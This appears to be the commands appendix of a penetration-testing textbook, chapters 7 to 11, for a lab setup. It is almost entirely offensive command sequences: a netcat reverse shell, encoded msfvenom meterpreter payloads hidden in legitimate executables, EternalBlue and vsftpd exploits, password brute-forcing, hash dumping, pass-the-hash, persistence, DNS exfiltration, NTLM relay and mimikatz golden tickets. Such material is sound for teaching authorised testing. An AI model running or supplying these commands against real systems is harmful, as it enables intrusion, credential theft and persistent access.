C:\Users\Bob> nc -nv 172.30.1.29 1234 -e cmd.exe

Command 7.7

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp

LHOST=172.30.1.29 LPORT=4444 -f exe -o payload.exe
Command 7.8

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp

LHOST=172.30.1.29 LPORT=4444 -f exe -o payload2.exe -e
x86/shikata_ga_nai -i 9
Command 7.9

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp

LHOST=172.30.1.29 LPORT=4444 -f exe -o encoded_payload3.exe
-e x86/shikata_ga_nai -i 9 -x /usr/share/windows-
binaries/whoami.exe
Command 7.10

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install shellter
Command 7.11

kali@kali:~$ sudo dpkg --add-architecture i386

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install wine32
Command 7.12
kali@kali:~$ cp /usr/share/windows-binaries/vncviewer.exe
./
Command 7.13

kali@kali:~$ sudo shellter

Command 7.14

kali@kali:~$ python3 -m http.server 8080

Command 7.15

kali@kali:~$ msfconsole
Command 7.16

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.30.1.29
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > exploit
Command 7.17

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt upgrade
Command 7.18

kali@kali:~$ sudo apt install realtek-rtl88xxau-dkms

Command 7.19

kali@kali:~$ git clone https://github.com/aircrack-

ng/rtl8812au
Command 7.20
kali@kali:~$ cd rtl8812au
kali@kali:~/rtl8812au$ sudo make
Command 7.21

kali@kali:~/rtl8812au$ sudo make install

Command 7.22

kali@kali:~$ sudo ifconfig wlan0 down

Command 7.23

kali@kali:~$ sudo iwconfig wlan0 mode monitor

Command 7.24

kali@kali:~$ sudo ifconfig wlan0 up

Command 7.25

kali@kali:~$ sudo aireplay-ng -9 wlan0

Command 7.26

kali@kali:~$ sudo ifconfig wlan0 down

kali@kali:~$ sudo iwconfig wlan0 mode managed
kali@kali:~$ sudo iwconfig wlan0 up
Command 7.27

kali@kali:~$ sudo airmon-ng check kill

Command 7.28

kali@kali:~$ sudo airmon-ng start wlan0

Command 7.29

kali@kali:~$ sudo aireplay-ng -9 wlan0mon

Command 7.30
kali@kali:~$ sudo airmon-ng stop wlan0mon
Command 7.31

Further reading
To learn more about Airmon-ng, go to https://www.aircrack-
ng.org/doku.php?id=airmon-ng.
 Chapter 8
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows 10 as a host operating system

 Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-
win2k8

 A dedicated hardware-based GPU/graphics card on your attacker computer

Images

Figure 8.1 – Passive host discovery

Figure 8.2 – Actively detecting live systems

Figure 8.3 – Checking NetBIOS information

Figure 8.4 – Identifying open service ports

 Figure 8.5 – Profiling a target

Figure 8.6 – Profiling live systems

Figure 8.7 – Checking for RDP on a target

 Figure 8.8 – User credentials found

Figure 8.9 – Online password cracking with Hydra

Figure 8.10 – RDP session

 Figure 8.11 – Discovering a running service

Figure 8.12 – Researching a vulnerability and its exploits

 Figure 8.13 – Searching for modules

Figure 8.14 – Exploiting vsFTPd

Figure 8.15 – Creating a Python-based pseudo-terminal shell

Figure 8.16 – Viewing the shadow file in Linux

 Figure 8.17 – Cracking password hashes

Figure 8.18 – Checking the status of the SMB service ports

Figure 8.19 – Searching for EternalBlue exploits

Figure 8.20 – Checking the vulnerability status of a host

Figure 8.21 – Retrieving user accounts

 Figure 8.22 – Identifying a hash

Figure 8.23 – Live password cracking

Figure 8.24 – Viewing the recovered passwords

Figure 8.25 – Exploiting SMB using the PsExec payload

Figure 8.26 – Gaining a Windows shell

Figure 8.27 – Viewing remote file shares

 Figure 8.28 – Accessing a remote share

Figure 8.29 – Viewing the contents within a remote share

 Figure 8.30 – Passing the hash

Figure 8.31 – Passing the hash with Impacket

Figure 8.32 – Passing the hash with FreeRDP

Figure 8.33 – Checking the SSH port's status

Figure 8.34 – Enumerating SSH usernames

Figure 8.35 – Gaining a shell

Figure 8.36 – Interacting with a session

Figure 8.37 – Checking for an open service port

Figure 8.38 – Checking the web application

Figure 8.39 – Checking HTTPS

 Figure 8.40 – Searching for WinRM modules

Figure 8.41 – Using the WinRM scanner on Metaploit

 Figure 8.42 – Exploiting WinRM

Figure 8.43 – Searching for ElasticSearch modules

Figure 8.44 – Exploiting Elasticsearch

 Figure 8.45 – Searching for SNMP enumeration modules

Figure 8.46 – Enumerating SNMP information

Code and Commands

kali@kali:~$ sudo netdiscover -r 172.30.1.0/24
Command 8.1

kali@kali:~$ nmap -sn 172.30.1.0/24

Command 8.2

kali@kali:~$ sudo nbtscan -r 172.30.1.0/24

Command 8.3
kali@kali:~$ nmap 172.30.1.21
Command 8.4

kali@kali:~$ nmap -A 172.30.1.21

Command 8.5

kali@kali:~$ nmap -A 172.30.1.23

Command 8.6

kali@kali:~$ gunzip /usr/share/wordlists/rockyou.txt.gz

Command 8.7

kali@kali:~$ ncrack -v -T 3 -u Administrator -P

/usr/share/wordlists/rockyou.txt rdp://172.30.1.21
Command 8.8

kali@kali:~$ hydra -t 4 -l Administrator -P

/usr/share/wordlists/rockyou.txt rdp://172.30.1.21
Command 8.9

kali@kali:~$ rdesktop -u Administrator -p vagrant

172.30.1.21 -g 1280x1024
Command 8.10

kali@kali:~$ cewl example.com -m 6 -w

output_dictionary_file.txt
Command 8.11

kali@kali:~$ crunch 4 4 0123456789ABC -o output_file.txt

Command 8.12

kali@kali:~$ nmap -A -p 21 172.30.1.23

Command 8.13
kali@kali:~$ msfconsole
Command 8.14

msf6 > search vsftpd

Command 8.15

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS
172.30.1.23
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Command 8.16

python -c 'import pty; pty.spawn("/bin/bash")'

Command 8.17

root@metasploitable:/# cat /etc/shadow

Command 8.18

kali@kali:~$ john user_hashes.txt --

wordlist=/usr/share/wordlists/rockyou.txt
Command 8.19

kali@kali:~$ nmap -p 136-139,445 172.30.1.21

Command 8.20

kali@kali:~$ msfconsole
Command 8.21

msf6 > search ms17-010

Command 8.22
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
Command 8.23

msf6 > use exploit/windows/smb/ms17_010_eternalblue

Command 8.24

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS

172.30.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST
172.30.1.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Command 8.25

meterpreter > hashdump

Command 8.26

Username : Security Identifier (SID) : LM hash : NTLM hash

Command 8.27

Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d
51f71d913c245d35b50b
Code 8.1

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt
Command 8.28

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt --show
Command 8.29
kali@kali:~$ msfconsole
Command 8.30

msf6 > use exploit/windows/smb/psexec

Command 8.31

msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.1.21

msf6 exploit(windows/smb/psexec) > set LHOST 172.30.1.20
Command 8.32

msf6 exploit(windows/smb/psexec) > set AutoRunScript

post/windows/manage/migrate
Command 8.33

msf6 exploit(windows/smb/psexec) > set SMBUSER

Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass vagrant
msf6 exploit(windows/smb/psexec) > exploit
Command 8.34

kali@kali:~$ smbclient -L \\\\172.30.1.21\\ -U

Administrator
Command 8.35

kali@kali:~$ smbclient \\\\172.30.1.21\\ADMIN$ -U

Administrator
Command 8.36

kali@kali:~$ smbclient \\\\172.30.1.21\\C$ -U Administrator

Command 8.37
smb: \> get jack_of_diamonds.png
smb: \> exit
Command 8.38

kali@kali:~$ pth-winexe -U
Administrator%aad3b435b51404eeaad3b435b51404ee:e02bc503339d
51f71d913c245d35b50b //172.30.1.21 cmd
Command 8.39

kali@kali:~$ impacket-psexec [email protected] -

hashes
aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d
35b50b
Command 8.40

kali@kali:~$ xfreerdp /u:Administrator

/pth:e02bc503339d51f71d913c245d35b50b /v:172.30.1.21
Command 8.41

kali@kali:~$ nmap -A -p 22 172.30.1.21

Command 8.42

kali@kali:~$ msfconsole
Command 8.43

msf6 > use auxiliary/scanner/ssh/ssh_enumusers

Command 8.44

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS

172.30.1.21
Command 8.45
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE
/usr/share/wordlists/metasploit/default_users_for_services_
unhash.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
Command 8.46

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE

/usr/share/wordlists/metasploit/default_users_for_services_
unhash.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
Command 8.47

msf6 > use auxiliary/scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME
Administrator
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD
vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
Command 8.48

kali@kali:~$ medusa -h 172.30.1.21 -u Administrator -P

/usr/share/wordlists/rockyou.txt -M ssh
Command 8.49

ACCOUNT FOUND: [ssh] Host: 172.30.1.21 User: Administrator

Password: vagrant [SUCCESS]
Command 8.50

kali@kali:~$ nmap -A -p 5985 172.30.1.21

Command 8.51
msf6 > use auxiliary/scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME
Administrator
msf6 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD
vagrant
msf6 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/winrm/winrm_cmd) > run
Command 8.52

msf6 > use exploit/windows/winrm/winrm_script_exec

msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS
172.30.1.21
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOSTS
172.30.1.20
Command 8.53

msf6 exploit(windows/winrm/winrm_script_exec) > set

FORCE_VBS true
Command 8.54

msf6 exploit(windows/winrm/winrm_script_exec) > set

USERNAME Administrator
msf6 exploit(windows/winrm/winrm_script_exec) > set
PASSWORD vagrant
msf6 exploit(windows/winrm/winrm_script_exec) > exploit
Command 8.55

msf6 > use exploit/multi/elasticsearch/script_mvel_rce

Command 8.56
msf6 exploit(multi/elasticsearch/script_mvel_rce) > set
RHOSTS 172.30.1.21
msf6 exploit(multi/elasticsearch/script_mvel_rce) > set
LHOST 172.30.1.20
msf6 exploit(multi/elasticsearch/script_mvel_rce) > exploit
Command 8.57

msf6 > use auxiliary/scanner/snmp/snmp_enum

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS
172.30.1.21
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Command 8.58

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
 Watering hole 101: https://www.trendmicro.com/vinfo/us/threat-
encyclopedia/web-attack/137/watering-hole-101

 Drive-by Compromise: https://attack.mitre.org/techniques/T1189/

 Credential access: https://attack.mitre.org/tactics/TA0006/

 Chapter 9
Images

Figure 9.1 – Lab topology

Figure 9.2 – Retrieving system information

Figure 9.3 – Determining user privileges

Figure 9.4 – Extracting password hashes from the SAM file

Figure 9.5 – Viewing running processes

Figure 9.6 – Migrating processes

Figure 9.7 – Uploading a file

 Figure 9.8 – Spawning the Windows native shell

Figure 9.9 – Interacting with the Windows native shell

Figure 9.10 – Downloading files

Figure 9.11 – Performing privilege escalation

 Figure 9.12 – Viewing tokens

Figure 9.13 – Observing impersonation tokens

Figure 9.14 – Impersonating another user

Figure 9.15 – Unable to view tokens as the administrator

Figure 9.16 – Escalating privileges

Figure 9.17 – Creating a new user

Figure 9.18 – Backgrounding the Meterpreter session

Figure 9.19 – Launching a persistence payload

Figure 9.20 – Receiving a callback session

Figure 9.21 – Penetration testing lab topology

 Figure 9.22 – Viewing the ARP cache

Figure 9.23 – Viewing IP addressing on Interface 11

Figure 9.24 – Discovering additional network adapters

 Figure 9.25 – Checking the routing table

Figure 9.26 – Using the autoroute post-exploitation module

Figure 9.27 – Performing a port scan

Figure 9.28 – Clearing logs

 Figure 9.29 – Encoding files

Figure 9.30 – Reassembled file

Figure 9.31 – Obtaining a reverse shell

Figure 9.32 – Modifying the system variables

Figure 9.33 – Creating a sensitive file

Figure 9.34 – PacketWhisper main menu

Figure 9.35 – Selecting a transfer mode and ciphers

Figure 9.36 – Previewing the cloaked data

Figure 9.37 – Starting the data exfiltration

Figure 9.38 – Data exfiltration via DNS messages

Figure 9.39 – DNS messages on Wireshark

Figure 9.40 – Extracting a file

 Figure 9.41 – Setting the PCAP file

Figure 9.42 – Selecting the operating system

Figure 9.43 – Choosing the cipher

Figure 9.44 – Decoding the cloaked file

 Figure 9.45 – Viewing the decloaked file

Figure 9.46 – Normal network communication

Figure 9.47 – Gratuitous ARP messages

 Figure 9.48 – MITM attack

Figure 9.49 – MITM attack using Ettercap

 Figure 9.50 – Capturing network packets

Figure 9.51 – Windows host ARP cache

Figure 9.52 – Verifying the MAC address of Kali Linux

Code and Commands
kali@kali:~$ sudo msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set
payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS
172.30.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST
172.30.1.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Command 9.1

meterpreter > run post/windows/manage/migrate

Command 9.2

meterpreter > upload /home/kali/vncviewer.exe c:\\

Command 9.3

C:\Windows\system32> cd\
C:\> dir
Command 9.4

meterpreter > download c:\\jack_of_diamonds.png /home/kali/

Command 9.5

meterpreter > use incognito

Command 9.6

meterpreter > list_tokens -u

Command 9.7
meterpreter > impersonate_token VAGRANT-
2008R2\\Administrator
Command 9.8

meterpreter > run post/windows/manage/enable_rdp

Command 9.10

msf6 > use exploit/windows/local/persistence

msf6 exploit(windows/local/persistence) > set SESSION 1
msf6 exploit(windows/local/persistence) > set STARTUP
SYSTEM
Command 9.11

msf6 exploit(windows/local/persistence) > set LHOST

172.30.1.20
msf6 exploit(windows/local/persistence) > set LPORT 87
msf6 exploit(windows/local/persistence) > exploit
Command 9.12

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 172.30.1.20
msf6 exploit(multi/handler) > set LPORT 87
msf6 exploit(multi/handler) > exploit
Command 9.13

meterpreter > run post/multi/manage/autoroute

Command 9.14
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS
10.11.12.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 80
msf6 auxiliary(scanner/portscan/tcp) > run
Command 9.15

kali@kali:~$ /usr/bin/exe2hex -x vncviewer.exe

Command 9.16

kali@kali:~$ sudo msfconsole

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 172.30.1.29
msf6 exploit(multi/handler) > exploit
Command 9.17

kali@kali:~$ python3 -m http.server 8080

Command 9.18

kali@kali:~$ git clone https://github.com/TryCatchHCF/PacketWhisper

kali@kali:~$ wget
https://github.com/TryCatchHCF/PacketWhisper/archive/refs/heads/master.zip
Command 9.19

kali@kali:~$ python3 -m http.server 8080

Command 9.20
C:\Users\vagrant> cd
C:\Users\vagrant\Downloads\master\PacketWhisper-master
Command 9.21

C:\Users\vagrant\Downloads\master\PacketWhisper-master>
python packetWhisper.py
Command 9.22

kali@kali:~$ cd PacketWhisper
kali@kali:~/PacketWhisper$ python packetWhisper.py
Command 9.23

kali@kali:~$ sudo ettercap -i eth1 -T -q -S -M arp:remote

/172.30.1.24// /172.30.1.21//
Command 9.24

Further reading
To learn more on the subject, check out the following resources:
 Vulnerabilities in the application and transport layers:
https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-
layer-of-the-tcp-ip-stack/

 PTES post-exploitation: http://www.pentest-

standard.org/index.php/Post_Exploitation

 MITM attacks: https://www.rapid7.com/fundamentals/man-in-the-middle-

attacks/
 Chapter 10
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows Server 2019: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-server-2019

 Windows 10 Enterprise: https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-10-enterprise

 hashcat: https://hashcat.net/hashcat/

 PowerView:
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

 Bloodhound: https://github.com/BloodHoundAD/BloodHound

Images

Figure 10.1 – Domain structure

 Figure 10.2 – Forest

Figure 10.3 – Red Team Lab topology

Figure 10.4 – Checking the domain's network status

Figure 10.5 – Downloading the PowerView.ps1 file

Figure 10.6 – Retrieving the current domain's details

 Figure 10.7 – Retrieving the Domain Policy

Figure 10.8 – Retrieving the domain controller's details

 Figure 10.9 – Retrieving user accounts

Figure 10.10 – Retrieving computer accounts

Figure 10.11 – Retrieving groups on the domain

Figure 10.12 – Retrieving local groups

 Figure 10.13 – Retrieving shares

Figure 10.14 – Retrieving forest information

Figure 10.15 – Retrieving the domains of the current forest

Figure 10.16 – Retrieving all global catalogs

Figure 10.17 – Discovering systems with local admin access

Figure 10.18 – Retrieving local administrator accounts

Figure 10.19 – Neo4j login page

 Figure 10.20 – Changing the password

Figure 10.21 – Bloodhound login interface

Figure 10.22 – Extracted Active Directory data

Figure 10.23 – Viewing Database Info
Figure 10.24 – Analytics templates
Figure 10.25 – Viewing the Domain Admin's attack paths

Figure 10.26 – Viewing the Domain Admin's attack path

 Figure 10.27 – Checking network interfaces

Figure 10.28 – Starting Responder

Figure 10.29 – Performing a UNC path connection

Figure 10.30 – Requesting network credentials

Figure 10.31 – Capturing the user's credentials

Figure 10.32 – Identifying the hash code

 Figure 10.33 – Retrieving a user's password

Figure 10.34 – Windows 10 client SMB security status

Figure 10.35 – Windows Server 2019 SMB security status

Figure 10.36 – Modifying the Responder configuration file

Figure 10.37 – Starting Responder

Figure 10.38 – Starting the NTLM Relay attack

 Figure 10.39 – Triggering an event

Figure 10.40 – Dumping the SAM database

Figure 10.41 – Triggering an event

 Figure 10.42 – Gaining a reverse shell from NTLM Relay

Code and Commands

kali@kali:~$ git clone
https://github.com/PowerShellMafia/PowerSploit
kali@kali:~$ cd PowerSploit/Recon
kali@kali:~/PowerTools/PowerView$ python3 -m http.server
8080
Command 10.1

C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -
ExecutionPolicy bypass
Command 10.2

PS C:\Users\bob.REDTEAMLAB\Downloads> . .\PowerView.ps1
Command 10.3

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomain
Command 10.4
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainSID
S-1-5-21-634716346-3108032190-2057695417
Command 10.5

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainPolicy
Command 10.6

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-
NetDomainController
Command 10.7

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetUser
Command 10.8

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetComputer
Command 10.9

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGroup
Command 10.10

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetLocalGroup -
ComputerName dc1.redteamlab.local
Command 10.11

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-ShareFinder -
Verbose
Command 10.12

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGPO
Command 10.13

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForest
Command 10.14
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestDomain
Command 10.15

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestCatalog
Command 10.16

PS C:\Users\bob.REDTEAMLAB\Downloads> Find-LocalAdminAccess
-Verbose
Command 10.17

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-
EnumerateLocalAdmin -Verbose
Command 10.18

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install bloodhound
Command 10.19

kali@kali:~$ sudo neo4j console

Command 10.20

kali@kali:~$ sudo bloodhound

Command 10.21

C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -
ExecutionPolicy bypass
Command 10.22

PS C:\Users\bob.REDTEAMLAB\Downloads> . .\SharpHound.ps1
Command 10.23
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-Bloodhound -
CollectionMethod All -Domain redteamlab.local -ZipFileName
redteamlab.zip
Command 10.24

kali@kali:~$ sudo responder -I eth2 –rdwv

Command 10.25

C:\WINDOWS\system32> cd C:\Users\Slayer\Downloads\hashcat-
6.2.3\hashcat-6.2.3
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 5600 NTLMv2-hash.txt rockyou.txt -O
Command 10.26

kali@kali:~$ nmap --script smb2-security-mode -p 445

192.168.42.0/24
Command 10.27

kali@kali:~$ sudo cp -R /usr/share/doc/python3-

impacket/examples /home/kali/Impacket
Command 10.28

kali@kali:~$ sudo mousepad /etc/responder/Responder.conf

Command 10.29

kali@kali:~$ sudo responder -I eth2 –rdw

Command 10.30

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t
192.168.42.23 -smb2support
Command 10.31
kali@kali:~$ sudo msfconsole
Command 10.32

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript
post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 192.168.42.20
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Command 10.33

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp

LHOST=192.168.42.20 LPORT=4444 -f exe -o payload4.exe -e
x86/shikata_ga_nai -i 9
Command 10.34

kali@kali:~$ sudo responder -I eth2 –rdw

Command 10.35

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t
192.168.42.23 -smb2support -e /home/kali/payload4.exe
Command 10.36
Further reading
To learn more about the topics that were covered in this chapter, visit the following
links:
 Active Directory Domain Services Overview:
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-
started/virtual-dc/active-directory-domain-services-overview

 PowerView command list:

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

 Bloodhound documentation:
https://bloodhound.readthedocs.io/en/latest/index.html

 LLMNR/NBT-NS Poisoning and SMB Relay:

https://attack.mitre.org/techniques/T1557/001/
 Chapter 11
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2 – https://www.kali.org/get-kali/

 Windows Server 2019 – https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-server-2019

 Windows 10 Enterprise – https://www.microsoft.com/en-

us/evalcenter/evaluate-windows-10-enterprise

 mitm6 – https://github.com/fox-it/mitm6

 Mimikatz – https://github.com/gentilkiwi/mimikatz/releases

Images

Figure 11.1 – Phase 1

Figure 11.2 – Phase 2

Figure 11.3 – Phase 3

Figure 11.3 – Phase 3

Figure 11.4 – Phase 4

 Figure 11.5 – Phase 5

Figure 11.6 – Configuring Certificate Services

 Figure 11.7 – Summary of AD CS

Figure 11.8 – Extracting Active Directory contents

Figure 11.9 – Active Directory contents

 Figure 11.10 – Taking over the domain

Figure 11.11 – Checking new user account

Figure 11.12 – Lateral movement

Figure 11.13 – Retrieving the SAM database

Figure 11.14 – Passing the hash

Figure 11.15 – Retrieving the LSA secrets

Figure 11.16 – Retrieving the TGS hash

Figure 11.17 – Retrieving the TGS password

Figure 11.18 – Launching Mimikatz

 Figure 11.19 – Retrieving domain users' credentials

Figure 11.20 – Domain Administrator user credentials

Figure 11.21 – Retrieving domain users' NTLM hashes

Figure 11.22 – Retrieving the domain SID

Figure 11.23 – Creating a golden ticket

Figure 11.24 – Golden ticket

Figure 11.25 – NTLM hash of users' and computers' accounts

Figure 11.26 – Creating a silver ticket

 Figure 11.27 – Silver ticket

Figure 11.28 – Creating a skeleton key

 Figure 11.29 – Authenticating using the skeleton key

Code and Commands

kali@kali:~$ git clone https://github.com/fox-it/mitm6
Command 11.1

kali@kali:~$ cd mitm6
kali@kali:~/mitm6$ pip3 install -r requirements.txt
kali@kali:~/mitm6$ sudo python setup.py install
Command 11.2

kali@kali:~/mitm6$ cd mitm6
kali@kali:~/mitm6/mitm6$ python3 mitm6.py -h
Command 11.3

PS C:\Users\Administrator> Install-WindowsFeature -Name AD-

Certificate,ADCS-Cert-Authority -Restart
Command 11.4
kali@kali:~$ cd mitm6/mitm6
kali@kali:~/mitm6/mitm6$ sudo python3 mitm6.py -i eth2 -d
redteamlab.local
Command 11.5

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -6 -t
ldaps://192.168.42.22 -wh wpad.redteamlab.local -l
/home/kali/mitm6-loot
Command 11.6

[*] Dumping domain info for first time

[*] Domain info dumped into lootdir!
Command 11.7

kali@kali:~$ ls mitm6-loot
Command 11.8

[*] Authenticating against ldaps://192.168.42.22 as

REDTEAMLAB\johndoe SUCCEED
[*] Enumerating relayed user's privileges. This may take a
while on large domains
Command 11.9

kali@kali:~$ sudo apt update

kali@kali:~$ sudo apt install crackmapexec
Command 11.10

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -

p Password1 -d redteamlab.local
Command 11.11
kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -
p Password1 -d redteamlab.local --sam
Command 11.12

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -

H ead0cc57ddaae50d876b7dd6386fa9c7 --local-auth
Command 11.13

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -

p Password1 -d redteamlab.local --lsa
Command 11.14

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 GetUserSPNs.py
redteamlab.local/bob:Password1 -dc-ip 192.168.42.22 -
request
Command 11.15

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 13100 TGS-hash.txt rockyou.txt -O
Command 11.16

kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ python3 -m http.server 8080
Command 11.17

PS C:\Users\sqladmin> Invoke-WebRequest -Uri

http://192.168.42.20:8080/mimikatz_trunk.zip -Outfile
'C:\Users\sqladmin\Downloads\mimikatz_trunk.zip'
Command 11.18
C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.19

mimikatz # sekurlsa::logonpasswords
Command 11.20

mimikatz # lsadump::lsa /patch

Command 11.21

C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.22

mimikatz # lsadump::lsa /inject /name:krbtgt

Command 11.23

mimikatz # kerberos::golden /user:FakeAdmin

/domain:redteamlab.local /sid:S-1-5-21-634716346-
3108032190-2057695417
